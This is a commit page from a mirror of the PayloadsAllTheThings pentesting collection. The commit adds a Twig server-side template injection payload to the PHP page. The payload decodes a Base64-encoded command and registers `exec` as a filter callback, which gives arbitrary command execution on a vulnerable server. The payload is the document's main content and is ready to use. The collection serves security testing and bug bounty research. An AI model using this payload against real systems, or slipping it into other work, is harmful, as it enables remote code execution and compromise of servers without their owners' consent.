Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2026-05-08 04:28:39 +02:00
Code Issues Projects Releases Wiki Activity

Merge 289573def1 into e961fef231

Browse source
This commit is contained in:
bootstrapbool 2026-04-23 20:08:19 +02:00 committed by GitHub
commit 10b2f20535
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
1 changed files with 6 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

6
Server Side Template Injection/PHP.md
View file

@ -201,6 +201,12 @@ The following payload, which harnesses the built-in `_context` variable, also ac
Reference and explanation of payload can be found [yeswehack/server-side-template-injection-exploitation](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation).
The following allows passing of a Base64 encoded payload.
```twig
{%set a%}UTF-8{%endset%}{%set b%}BASE64{%endset%}{%set p%}base64 encoded string{%endset%}{%set p = p|convert_encoding((a), (b))%}{%set e%}exec{%endset%}{{_self.env.registerUndefinedFilterCallback(e|lower)}}{{_self.env.getFilter(p)}}
```
---
## Latte